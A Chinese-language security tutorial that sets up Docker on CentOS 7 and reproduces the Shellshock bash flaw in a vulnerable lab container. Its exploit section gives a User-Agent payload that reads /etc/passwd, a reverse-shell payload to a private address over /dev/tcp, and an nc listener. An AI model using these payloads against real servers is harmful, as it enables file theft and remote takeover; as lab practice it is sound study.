黑基网 首页 学院 网络安全 查看内容

「安全小实验」利用Docker快速搭建并复现bash

2017-9-18 09:14| 投稿: xiaotiger |来自: 互联网

摘要: 上一篇讲了乌班图的docker安装,这次复现使用centos7,意图很明显啦,就是为了让大家都知道这两种linux。最后一个经典的bash漏洞复现。不说题外话啦,开始正文1、centos7安装centos7 自带安装yum install docker启动 ...

上一篇讲了乌班图的docker安装,这次复现使用centos7,意图很明显啦,就是为了让大家都知道这两种linux。最后一个经典的bash漏洞复现。不说题外话啦,开始正文

1、centos7安装

centos7 自带安装

yum install docker

启动docker

Systemctl start docker

Systemctl status docker

开启的状态

2、镜像安装

注意:这里需要阿里的更新源,否则docker语句会出现错误

搜索镜像

Docker search centos7

获取镜像

Docker pull docker.io/centos (镜像名字)

3.进入容器与退出容器

docker run -t -i docker.io/centos /bin/bash

其中-t 选项让Docker分配一个伪终端(pseudo-tty)并绑定到容器的标准输入上, -i 则让容器的标准输入保持打开。

使用exit 可以退出容器.

查看有哪些容器

docker images

打包容器

docker save -o centos7.tar docker.io/centos

载入容器

docker load --input centos7.tar

查看进程中的镜像

Docker ps -a

终止镜像

Docker stop 263c082d8fd6

移除镜像

Docker rmi 263c082d8fd6

漏洞1 bash_shellshock

首先,问题起因于一个命令ENV。

原型:

env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...]

Man是这么说的:

Display, set, or remove environment variables,Run a command in a modified environment.

我的理解是使用env命令的key=value,首先会改变环境变量key,如果没有会临时创建,注意,这里是临时的改变环境变量。然后就把value后面的内容当做命令执行,类似于PHP中的eval。

利用方法

1、pull docker镜像,搭建环境

docker pull medicean/vulapps:b_bash_shellshock1

2、启动镜像

docker run -d -p 1000:80 medicean/vulapps:b_bash_shellshock1

3、使用burp抓包,更改UA

() { :;};echo ; echo; echo $(/bin/cat /etc/passwd );

反弹shell

() { :; }; /bin/bash -i >& /dev/tcp/192.168.1.12/8888 0>&1;

Kali运行

nc -l -p 8888 -vvv

某云案例

具体链接就不发了,可自行搜索shellshock,有问题可关注发送留言哦~~~~~

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:http://www.toutiao.com/a6466572206691320334/

免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部